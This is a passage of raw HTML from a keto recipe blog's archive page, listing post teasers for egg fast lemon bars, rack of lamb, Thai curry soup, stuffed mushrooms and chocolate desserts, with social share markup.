datetime="2019-03-10T12:59:31-07:00"> <a href="https://ketogenicwoman.com/keto-egg-fast-lemon-bars/" title="" rel="bookmark"><span class="entry-date"></span> <span class="entry-time"> - </span></a> </time><span class="bl_sep">|</span><time class="updated" datetime="2019-04-07T16:15:17-07:00"></time> <span class="bl_categ"> <a href="https://ketogenicwoman.com/category/egg-fast-diet/" rel="tag">Egg Fast Diet</a> </span> <div class="comments-link"> <a href="https://ketogenicwoman.com/keto-egg-fast-lemon-bars/#comments">6 Comments</a> </div> </div> </header> <div class="entry-summary"> <a class="post-thumbnail-link" href="https://ketogenicwoman.com/keto-egg-fast-lemon-bars/" title="Keto Egg Fast Lemon Bars"><img width="150" height="150" src="https://ketogenicwoman.com/wp-content/uploads/2019/03/Egg-Fast-Lemon-Bars-feature-150x150.jpg" class="alignleft post-thumbnail wp-post-image" alt="Egg Fast Lemon Bars" srcset="https://ketogenicwoman.com/wp-content/uploads/2019/03/Egg-Fast-Lemon-Bars-feature-150x150.jpg 150w, https://ketogenicwoman.com/wp-content/uploads/2019/03/Egg-Fast-Lemon-Bars-feature-300x300.jpg 300w, https://ketogenicwoman.com/wp-content/uploads/2019/03/Egg-Fast-Lemon-Bars-feature-200x200.jpg 200w, https://ketogenicwoman.com/wp-content/uploads/2019/03/Egg-Fast-Lemon-Bars-feature-320x320.jpg 320w, https://ketogenicwoman.com/wp-content/uploads/2019/03/Egg-Fast-Lemon-Bars-feature.jpg 400w" sizes="(max-width: 150px) 100vw, 150px" /></a> <p>Keto Egg Fast Lemon Bars This fantastic cheesecake type recipe for Egg Fast Lemon bars originally came from a couple of group members in the Egg Fast Stall Breaker facebook support group. I tried it and I loved it but my big issue with it was the egg to fat … <a class="continue-reading-link" href="https://ketogenicwoman.com/keto-egg-fast-lemon-bars/"> Continue reading <span class="meta-nav">&rarr; </span></a></p> <div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_32 addtoany_list" data-a2a-url="https://ketogenicwoman.com/keto-egg-fast-lemon-bars/" data-a2a-title="Keto Egg Fast Lemon Bars"><a class="a2a_button_facebook a2a_counter external" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fketo-egg-fast-lemon-bars%2F&amp;linkname=Keto%20Egg%20Fast%20Lemon%20Bars" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_twitter external" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fketo-egg-fast-lemon-bars%2F&amp;linkname=Keto%20Egg%20Fast%20Lemon%20Bars" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_pinterest a2a_counter external" href="https://www.addtoany.com/add_to/pinterest?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fketo-egg-fast-lemon-bars%2F&amp;linkname=Keto%20Egg%20Fast%20Lemon%20Bars" title="Pinterest" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit external" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fketo-egg-fast-lemon-bars%2F&amp;linkname=Keto%20Egg%20Fast%20Lemon%20Bars" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_tumblr external" href="https://www.addtoany.com/add_to/tumblr?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fketo-egg-fast-lemon-bars%2F&amp;linkname=Keto%20Egg%20Fast%20Lemon%20Bars" title="Tumblr" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share external" href="https://www.addtoany.com/share" rel="nofollow" target="_blank"></a></div></div> </div> <footer class="entry-meta2"> <span class="bl_tagg">Tagged <a href="https://ketogenicwoman.com/tag/keto-egg-fast-recipes/" rel="tag">Keto egg fast recipes</a>, <a href="https://ketogenicwoman.com/tag/lemon/" rel="tag">lemon</a></span> </footer> </article> <article id="post-1934" class="post-1934 post type-post status-publish format-standard has-post-thumbnail hentry category-keto-main-meals tag-keto-easter-meal tag-lamb"> <header class="entry-header"> <h2 class="entry-title"> <a href="https://ketogenicwoman.com/easy-keto-rack-of-lamb/" title="Permalink to Easy Keto Rack of Lamb with Herbs and Garlic" rel="bookmark"> Easy Keto Rack of Lamb with Herbs and Garlic </a> </h2> <div class="entry-meta"> <span class="author vcard"> By <a class="url fn n" rel="author" href="https://ketogenicwoman.com/author/anitabreeze/" title="View all posts by KetoWoman">KetoWoman</a> <span class="bl_sep">|</span></span> <time class="onDate date published" datetime="2019-03-01T18:40:54-07:00"> <a href="https://ketogenicwoman.com/easy-keto-rack-of-lamb/" title="" rel="bookmark"><span class="entry-date"></span> <span class="entry-time"> - </span></a> </time><span class="bl_sep">|</span><time class="updated" datetime="2019-03-02T07:14:48-07:00"></time> <span class="bl_categ"> <a href="https://ketogenicwoman.com/category/recipes/keto-main-meals/" rel="tag">Keto Main Meals</a> </span> <div class="comments-link"> <a href="https://ketogenicwoman.com/easy-keto-rack-of-lamb/#respond">Leave a comment</a> </div> </div> </header> <div class="entry-summary"> <a class="post-thumbnail-link" href="https://ketogenicwoman.com/easy-keto-rack-of-lamb/" title="Easy Keto Rack of Lamb with Herbs and Garlic"><img width="250" height="141" src="https://ketogenicwoman.com/wp-content/uploads/2019/03/Keto-Rack-of-Lamb-250x141.jpg" class="alignleft post-thumbnail wp-post-image" alt="Low Carb Roasted Rack of Lamb Dinner" srcset="https://ketogenicwoman.com/wp-content/uploads/2019/03/Keto-Rack-of-Lamb-250x141.jpg 250w, https://ketogenicwoman.com/wp-content/uploads/2019/03/Keto-Rack-of-Lamb-300x169.jpg 300w, https://ketogenicwoman.com/wp-content/uploads/2019/03/Keto-Rack-of-Lamb-150x84.jpg 150w, https://ketogenicwoman.com/wp-content/uploads/2019/03/Keto-Rack-of-Lamb-320x180.jpg 320w, https://ketogenicwoman.com/wp-content/uploads/2019/03/Keto-Rack-of-Lamb-480x270.jpg 480w, https://ketogenicwoman.com/wp-content/uploads/2019/03/Keto-Rack-of-Lamb.jpg 560w" sizes="(max-width: 250px) 100vw, 250px" /></a> <p>Easy Rack of Lamb with Herbs and Garlic (Keto and Low Carb) If you are looking for an elegant meal to serve on a special occasion, I have to say that a roast rack of lamb will certainly impress your guests. Yet it is one of the easiest meals to … <a class="continue-reading-link" href="https://ketogenicwoman.com/easy-keto-rack-of-lamb/"> Continue reading <span class="meta-nav">&rarr; </span></a></p> <div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_32 addtoany_list" data-a2a-url="https://ketogenicwoman.com/easy-keto-rack-of-lamb/" data-a2a-title="Easy Keto Rack of Lamb with Herbs and Garlic"><a class="a2a_button_facebook a2a_counter external" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fketogenicwoman.com%2Feasy-keto-rack-of-lamb%2F&amp;linkname=Easy%20Keto%20Rack%20of%20Lamb%20with%20Herbs%20and%20Garlic" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_twitter external" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fketogenicwoman.com%2Feasy-keto-rack-of-lamb%2F&amp;linkname=Easy%20Keto%20Rack%20of%20Lamb%20with%20Herbs%20and%20Garlic" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_pinterest a2a_counter external" href="https://www.addtoany.com/add_to/pinterest?linkurl=https%3A%2F%2Fketogenicwoman.com%2Feasy-keto-rack-of-lamb%2F&amp;linkname=Easy%20Keto%20Rack%20of%20Lamb%20with%20Herbs%20and%20Garlic" title="Pinterest" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit external" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fketogenicwoman.com%2Feasy-keto-rack-of-lamb%2F&amp;linkname=Easy%20Keto%20Rack%20of%20Lamb%20with%20Herbs%20and%20Garlic" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_tumblr external" href="https://www.addtoany.com/add_to/tumblr?linkurl=https%3A%2F%2Fketogenicwoman.com%2Feasy-keto-rack-of-lamb%2F&amp;linkname=Easy%20Keto%20Rack%20of%20Lamb%20with%20Herbs%20and%20Garlic" title="Tumblr" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share external" href="https://www.addtoany.com/share" rel="nofollow" target="_blank"></a></div></div> </div> <footer class="entry-meta2"> <span class="bl_tagg">Tagged <a href="https://ketogenicwoman.com/tag/keto-easter-meal/" rel="tag">Keto Easter meal</a>, <a href="https://ketogenicwoman.com/tag/lamb/" rel="tag">Lamb</a></span> </footer> </article> <article id="post-1947" class="post-1947 post type-post status-publish format-standard has-post-thumbnail hentry category-egg-fast-diet tag-egg-fast tag-egg-fast-menu"> <header class="entry-header"> <h2 class="entry-title"> <a href="https://ketogenicwoman.com/egg-fast-tracker/" title="Permalink to Keto Egg Fast Tracker and Planning Tools" rel="bookmark"> Keto Egg Fast Tracker and Planning Tools </a> </h2> <div class="entry-meta"> <span class="author vcard"> By <a class="url fn n" rel="author" href="https://ketogenicwoman.com/author/anitabreeze/" title="View all posts by KetoWoman">KetoWoman</a> <span class="bl_sep">|</span></span> <time class="onDate date published" datetime="2019-02-25T07:57:22-07:00"> <a href="https://ketogenicwoman.com/egg-fast-tracker/" title="" rel="bookmark"><span class="entry-date"></span> <span class="entry-time"> - </span></a> </time><span class="bl_sep">|</span><time class="updated" datetime="2019-03-27T15:18:06-07:00"></time> <span class="bl_categ"> <a href="https://ketogenicwoman.com/category/egg-fast-diet/" rel="tag">Egg Fast Diet</a> </span> <div class="comments-link"> <a href="https://ketogenicwoman.com/egg-fast-tracker/#respond">Leave a comment</a> </div> </div> </header> <div class="entry-summary"> <a class="post-thumbnail-link" href="https://ketogenicwoman.com/egg-fast-tracker/" title="Keto Egg Fast Tracker and Planning Tools"><img width="250" height="141" src="https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Egg-Fast-Tracker-250x141.jpg" class="alignleft post-thumbnail wp-post-image" alt="Keeping track of egg and fats on the Keto Egg Fast" srcset="https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Egg-Fast-Tracker-250x141.jpg 250w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Egg-Fast-Tracker-300x169.jpg 300w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Egg-Fast-Tracker-150x84.jpg 150w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Egg-Fast-Tracker-320x180.jpg 320w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Egg-Fast-Tracker-480x270.jpg 480w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Egg-Fast-Tracker.jpg 560w" sizes="(max-width: 250px) 100vw, 250px" /></a> <p>Keto Egg Fast Tracker and Planning Tools I&#8217;ve assembled a few tools here to help you in your Egg Fast Tracking as well as meal planning. There is the Egg Fast grocery list, the basic rules and the Egg fast Tracker app for Android and iPhone. There is also the … <a class="continue-reading-link" href="https://ketogenicwoman.com/egg-fast-tracker/"> Continue reading <span class="meta-nav">&rarr; </span></a></p> <div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_32 addtoany_list" data-a2a-url="https://ketogenicwoman.com/egg-fast-tracker/" data-a2a-title="Keto Egg Fast Tracker and Planning Tools"><a class="a2a_button_facebook a2a_counter external" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fegg-fast-tracker%2F&amp;linkname=Keto%20Egg%20Fast%20Tracker%20and%20Planning%20Tools" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_twitter external" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fegg-fast-tracker%2F&amp;linkname=Keto%20Egg%20Fast%20Tracker%20and%20Planning%20Tools" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_pinterest a2a_counter external" href="https://www.addtoany.com/add_to/pinterest?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fegg-fast-tracker%2F&amp;linkname=Keto%20Egg%20Fast%20Tracker%20and%20Planning%20Tools" title="Pinterest" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit external" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fegg-fast-tracker%2F&amp;linkname=Keto%20Egg%20Fast%20Tracker%20and%20Planning%20Tools" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_tumblr external" href="https://www.addtoany.com/add_to/tumblr?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fegg-fast-tracker%2F&amp;linkname=Keto%20Egg%20Fast%20Tracker%20and%20Planning%20Tools" title="Tumblr" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share external" href="https://www.addtoany.com/share" rel="nofollow" target="_blank"></a></div></div> </div> <footer class="entry-meta2"> <span class="bl_tagg">Tagged <a href="https://ketogenicwoman.com/tag/egg-fast/" rel="tag">egg fast</a>, <a href="https://ketogenicwoman.com/tag/egg-fast-menu/" rel="tag">egg fast menu</a></span> </footer> </article> <article id="post-1878" class="post-1878 post type-post status-publish format-standard has-post-thumbnail hentry category-keto-chicken-recipes tag-chicken tag-instant-pot-recipes tag-keto-soups"> <header class="entry-header"> <h2 class="entry-title"> <a href="https://ketogenicwoman.com/keto-thai-coconut-curry-soup/" title="Permalink to Keto Thai Coconut Curry Soup (Instant Pot and Stove Top)" rel="bookmark"> Keto Thai Coconut Curry Soup (Instant Pot and Stove Top) </a> </h2> <div class="entry-meta"> <span class="author vcard"> By <a class="url fn n" rel="author" href="https://ketogenicwoman.com/author/anitabreeze/" title="View all posts by KetoWoman">KetoWoman</a> <span class="bl_sep">|</span></span> <time class="onDate date published" datetime="2019-02-21T18:51:28-07:00"> <a href="https://ketogenicwoman.com/keto-thai-coconut-curry-soup/" title="" rel="bookmark"><span class="entry-date"></span> <span class="entry-time"> - </span></a> </time><span class="bl_sep">|</span><time class="updated" datetime="2019-02-21T18:51:28-07:00"></time> <span class="bl_categ"> <a href="https://ketogenicwoman.com/category/recipes/keto-chicken-recipes/" rel="tag">Keto Chicken &amp; Poultry Recipes</a> </span> <div class="comments-link"> <a href="https://ketogenicwoman.com/keto-thai-coconut-curry-soup/#respond">Leave a comment</a> </div> </div> </header> <div class="entry-summary"> <a class="post-thumbnail-link" href="https://ketogenicwoman.com/keto-thai-coconut-curry-soup/" title="Keto Thai Coconut Curry Soup (Instant Pot and Stove Top)"><img width="150" height="150" src="https://ketogenicwoman.com/wp-content/uploads/2019/02/Low-Carb-Thai-Coconut-Curry-Soup-150x150.jpg" class="alignleft post-thumbnail wp-post-image" alt="Low Carb Thai Coconut Curry Soup" srcset="https://ketogenicwoman.com/wp-content/uploads/2019/02/Low-Carb-Thai-Coconut-Curry-Soup-150x150.jpg 150w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Low-Carb-Thai-Coconut-Curry-Soup-300x300.jpg 300w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Low-Carb-Thai-Coconut-Curry-Soup-768x768.jpg 768w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Low-Carb-Thai-Coconut-Curry-Soup-1024x1024.jpg 1024w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Low-Carb-Thai-Coconut-Curry-Soup-200x200.jpg 200w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Low-Carb-Thai-Coconut-Curry-Soup-320x320.jpg 320w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Low-Carb-Thai-Coconut-Curry-Soup-480x480.jpg 480w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Low-Carb-Thai-Coconut-Curry-Soup-720x720.jpg 720w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Low-Carb-Thai-Coconut-Curry-Soup-735x735.jpg 735w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Low-Carb-Thai-Coconut-Curry-Soup.jpg 1080w" sizes="(max-width: 150px) 100vw, 150px" /></a> <p>Keto Thai Coconut Curry Soup I make several different versions of chicken curry soups just because I love the flavors so much!&nbsp; Which version of this flavorful low carb curry soup I make is really all about what I happen to have in my pantry and fridge on that day! … <a class="continue-reading-link" href="https://ketogenicwoman.com/keto-thai-coconut-curry-soup/"> Continue reading <span class="meta-nav">&rarr; </span></a></p> <div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_32 addtoany_list" data-a2a-url="https://ketogenicwoman.com/keto-thai-coconut-curry-soup/" data-a2a-title="Keto Thai Coconut Curry Soup (Instant Pot and Stove Top)"><a class="a2a_button_facebook a2a_counter external" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fketo-thai-coconut-curry-soup%2F&amp;linkname=Keto%20Thai%20Coconut%20Curry%20Soup%20%28Instant%20Pot%20and%20Stove%20Top%29" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_twitter external" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fketo-thai-coconut-curry-soup%2F&amp;linkname=Keto%20Thai%20Coconut%20Curry%20Soup%20%28Instant%20Pot%20and%20Stove%20Top%29" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_pinterest a2a_counter external" href="https://www.addtoany.com/add_to/pinterest?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fketo-thai-coconut-curry-soup%2F&amp;linkname=Keto%20Thai%20Coconut%20Curry%20Soup%20%28Instant%20Pot%20and%20Stove%20Top%29" title="Pinterest" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit external" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fketo-thai-coconut-curry-soup%2F&amp;linkname=Keto%20Thai%20Coconut%20Curry%20Soup%20%28Instant%20Pot%20and%20Stove%20Top%29" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_tumblr external" href="https://www.addtoany.com/add_to/tumblr?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fketo-thai-coconut-curry-soup%2F&amp;linkname=Keto%20Thai%20Coconut%20Curry%20Soup%20%28Instant%20Pot%20and%20Stove%20Top%29" title="Tumblr" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share external" href="https://www.addtoany.com/share" rel="nofollow" target="_blank"></a></div></div> </div> <footer class="entry-meta2"> <span class="bl_tagg">Tagged <a href="https://ketogenicwoman.com/tag/chicken/" rel="tag">chicken</a>, <a href="https://ketogenicwoman.com/tag/instant-pot-recipes/" rel="tag">instant pot recipes</a>, <a href="https://ketogenicwoman.com/tag/keto-soups/" rel="tag">keto soups</a></span> </footer> </article> <article id="post-1876" class="post-1876 post type-post status-publish format-standard has-post-thumbnail hentry category-keto-chicken-recipes tag-chicken tag-keto-appetizers"> <header class="entry-header"> <h2 class="entry-title"> <a href="https://ketogenicwoman.com/keto-turkey-stuffed-mushrooms/" title="Permalink to Keto Turkey Stuffed Mushrooms" rel="bookmark"> Keto Turkey Stuffed Mushrooms </a> </h2> <div class="entry-meta"> <span class="author vcard"> By <a class="url fn n" rel="author" href="https://ketogenicwoman.com/author/anitabreeze/" title="View all posts by KetoWoman">KetoWoman</a> <span class="bl_sep">|</span></span> <time class="onDate date published" datetime="2019-02-20T21:53:18-07:00"> <a href="https://ketogenicwoman.com/keto-turkey-stuffed-mushrooms/" title="" rel="bookmark"><span class="entry-date"></span> <span class="entry-time"> - </span></a> </time><span class="bl_sep">|</span><time class="updated" datetime="2019-02-21T11:09:05-07:00"></time> <span class="bl_categ"> <a href="https://ketogenicwoman.com/category/recipes/keto-chicken-recipes/" rel="tag">Keto Chicken &amp; Poultry Recipes</a> </span> <div class="comments-link"> <a href="https://ketogenicwoman.com/keto-turkey-stuffed-mushrooms/#respond">Leave a comment</a> </div> </div> </header> <div class="entry-summary"> <a class="post-thumbnail-link" href="https://ketogenicwoman.com/keto-turkey-stuffed-mushrooms/" title="Keto Turkey Stuffed Mushrooms"><img width="225" height="150" src="https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Turkey-Stuffed-Portabello-Mushrooms-225x150.jpg" class="alignleft post-thumbnail wp-post-image" alt="Keto Turkey Stuffed Portobello Mushrooms" srcset="https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Turkey-Stuffed-Portabello-Mushrooms-225x150.jpg 225w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Turkey-Stuffed-Portabello-Mushrooms-300x200.jpg 300w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Turkey-Stuffed-Portabello-Mushrooms-150x100.jpg 150w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Turkey-Stuffed-Portabello-Mushrooms.jpg 600w" sizes="(max-width: 225px) 100vw, 225px" /></a> <p>Keto Turkey Stuffed Mushrooms I love this low carb recipe for turkey sausage stuffed portabello mushrooms! It is an extremely versatile recipe.&nbsp; You can make it spicy or not.&nbsp; You can use turkey sausage or chicken sausage. You can use large portabello mushrooms and make 4 dinner portions or you … <a class="continue-reading-link" href="https://ketogenicwoman.com/keto-turkey-stuffed-mushrooms/"> Continue reading <span class="meta-nav">&rarr; </span></a></p> <div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_32 addtoany_list" data-a2a-url="https://ketogenicwoman.com/keto-turkey-stuffed-mushrooms/" data-a2a-title="Keto Turkey Stuffed Mushrooms"><a class="a2a_button_facebook a2a_counter external" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fketo-turkey-stuffed-mushrooms%2F&amp;linkname=Keto%20Turkey%20Stuffed%20Mushrooms" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_twitter external" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fketo-turkey-stuffed-mushrooms%2F&amp;linkname=Keto%20Turkey%20Stuffed%20Mushrooms" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_pinterest a2a_counter external" href="https://www.addtoany.com/add_to/pinterest?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fketo-turkey-stuffed-mushrooms%2F&amp;linkname=Keto%20Turkey%20Stuffed%20Mushrooms" title="Pinterest" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit external" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fketo-turkey-stuffed-mushrooms%2F&amp;linkname=Keto%20Turkey%20Stuffed%20Mushrooms" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_tumblr external" href="https://www.addtoany.com/add_to/tumblr?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fketo-turkey-stuffed-mushrooms%2F&amp;linkname=Keto%20Turkey%20Stuffed%20Mushrooms" title="Tumblr" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share external" href="https://www.addtoany.com/share" rel="nofollow" target="_blank"></a></div></div> </div> <footer class="entry-meta2"> <span class="bl_tagg">Tagged <a href="https://ketogenicwoman.com/tag/chicken/" rel="tag">chicken</a>, <a href="https://ketogenicwoman.com/tag/keto-appetizers/" rel="tag">Keto Appetizers</a></span> </footer> </article> <article id="post-1844" class="post-1844 post type-post status-publish format-standard has-post-thumbnail hentry category-fat-bomb-recipes category-keto-desserts tag-chocolate tag-valentine"> <header class="entry-header"> <h2 class="entry-title"> <a href="https://ketogenicwoman.com/low-carb-keto-chocolate-treat-recipes/" title="Permalink to 21 Low Carb Keto Chocolate Treat Recipes for Valentine&#8217;s Day" rel="bookmark"> 21 Low Carb Keto Chocolate Treat Recipes for Valentine&#8217;s Day </a> </h2> <div class="entry-meta"> <span class="author vcard"> By <a class="url fn n" rel="author" href="https://ketogenicwoman.com/author/anitabreeze/" title="View all posts by KetoWoman">KetoWoman</a> <span class="bl_sep">|</span></span> <time class="onDate date published" datetime="2019-02-09T17:43:56-07:00"> <a href="https://ketogenicwoman.com/low-carb-keto-chocolate-treat-recipes/" title="" rel="bookmark"><span class="entry-date"></span> <span class="entry-time"> - </span></a> </time><span class="bl_sep">|</span><time class="updated" datetime="2019-02-09T21:24:07-07:00"></time> <span class="bl_categ"> <a href="https://ketogenicwoman.com/category/recipes/fat-bomb-recipes/" rel="tag">Fat Bomb Recipes</a>, <a href="https://ketogenicwoman.com/category/recipes/keto-desserts/" rel="tag">Keto Desserts</a> </span> <div class="comments-link"> <a href="https://ketogenicwoman.com/low-carb-keto-chocolate-treat-recipes/#respond">Leave a comment</a> </div> </div> </header> <div class="entry-summary"> <a class="post-thumbnail-link" href="https://ketogenicwoman.com/low-carb-keto-chocolate-treat-recipes/" title="21 Low Carb Keto Chocolate Treat Recipes for Valentine&#039;s Day"><img width="150" height="150" src="https://ketogenicwoman.com/wp-content/uploads/2019/02/Square-150x150.jpg" class="alignleft post-thumbnail wp-post-image" alt="Keto Low Carb Valentine Chocolate desserts" srcset="https://ketogenicwoman.com/wp-content/uploads/2019/02/Square-150x150.jpg 150w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Square-300x300.jpg 300w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Square-200x200.jpg 200w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Square-320x320.jpg 320w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Square-480x480.jpg 480w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Square-720x720.jpg 720w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Square-735x735.jpg 735w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Square.jpg 750w" sizes="(max-width: 150px) 100vw, 150px" /></a> <p>21 Low Carb Keto Chocolate Treat Recipes for Valentine&#8217;s Day Another Valentine&#8217;s Day is approaching and you know what means right!? Well in my world it means chocolate! I have put the call out to my fellow bloggers to give me their best low carb chocolate treat and dessert recipes … <a class="continue-reading-link" href="https://ketogenicwoman.com/low-carb-keto-chocolate-treat-recipes/"> Continue reading <span class="meta-nav">&rarr; </span></a></p> <div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_32 addtoany_list" data-a2a-url="https://ketogenicwoman.com/low-carb-keto-chocolate-treat-recipes/" data-a2a-title="21 Low Carb Keto Chocolate Treat Recipes for Valentine’s Day"><a class="a2a_button_facebook a2a_counter external" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fketogenicwoman.com%2Flow-carb-keto-chocolate-treat-recipes%2F&amp;linkname=21%20Low%20Carb%20Keto%20Chocolate%20Treat%20Recipes%20for%20Valentine%E2%80%99s%20Day" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_twitter external" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fketogenicwoman.com%2Flow-carb-keto-chocolate-treat-recipes%2F&amp;linkname=21%20Low%20Carb%20Keto%20Chocolate%20Treat%20Recipes%20for%20Valentine%E2%80%99s%20Day" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_pinterest a2a_counter external" href="https://www.addtoany.com/add_to/pinterest?linkurl=https%3A%2F%2Fketogenicwoman.com%2Flow-carb-keto-chocolate-treat-recipes%2F&amp;linkname=21%20Low%20Carb%20Keto%20Chocolate%20Treat%20Recipes%20for%20Valentine%E2%80%99s%20Day" title="Pinterest" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit external" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fketogenicwoman.com%2Flow-carb-keto-chocolate-treat-recipes%2F&amp;linkname=21%20Low%20Carb%20Keto%20Chocolate%20Treat%20Recipes%20for%20Valentine%E2%80%99s%20Day" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_tumblr external" href="https://www.addtoany.com/add_to/tumblr?linkurl=https%3A%2F%2Fketogenicwoman.com%2Flow-carb-keto-chocolate-treat-recipes%2F&amp;linkname=21%20Low%20Carb%20Keto%20Chocolate%20Treat%20Recipes%20for%20Valentine%E2%80%99s%20Day" title="Tumblr" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share external" href="https://www.addtoany.com/share" rel="nofollow" target="_blank"></a></div></div> </div> <footer class="entry-meta2"> <span class="bl_tagg">Tagged <a href="https://ketogenicwoman.com/tag/chocolate/" rel="tag">chocolate</a>, <a href="https://ketogenicwoman.com/tag/valentine/" rel="tag">valentine</a></span> </footer> </article> <article id="post-1823" class="post-1823 post type-post status-publish format-standard has-post-thumbnail hentry category-keto-desserts tag-chocolate tag-low-carb-desserts"> <header class="entry-header"> <h2 class="entry-title"> <a href="https://ketogenicwoman.com/keto-chocolate-peanut-butter-dessert-bars/" title="Permalink to Keto Chocolate Peanut Butter Dessert Bars" rel="bookmark"> Keto Chocolate Peanut Butter Dessert Bars </a> </h2> <div class="entry-meta"> <span class="author vcard"> By <a class="url fn n" rel="author" href="https://ketogenicwoman.com/author/anitabreeze/" title="View all posts by KetoWoman">KetoWoman</a> <span class="bl_sep">|</span></span> <time class="onDate date published" datetime="2019-02-08T19:53:49-07:00"> <a href="https://ketogenicwoman.com/keto-chocolate-peanut-butter-dessert-bars/" title="" rel="bookmark"><span class="entry-date"></span> <span class="entry-time"> - </span></a> </time><span class="bl_sep">|</span><time class="updated" datetime="2019-02-10T14:39:56-07:00"></time> <span class="bl_categ"> <a href="https://ketogenicwoman.com/category/recipes/keto-desserts/" rel="tag">Keto Desserts</a> </span> <div 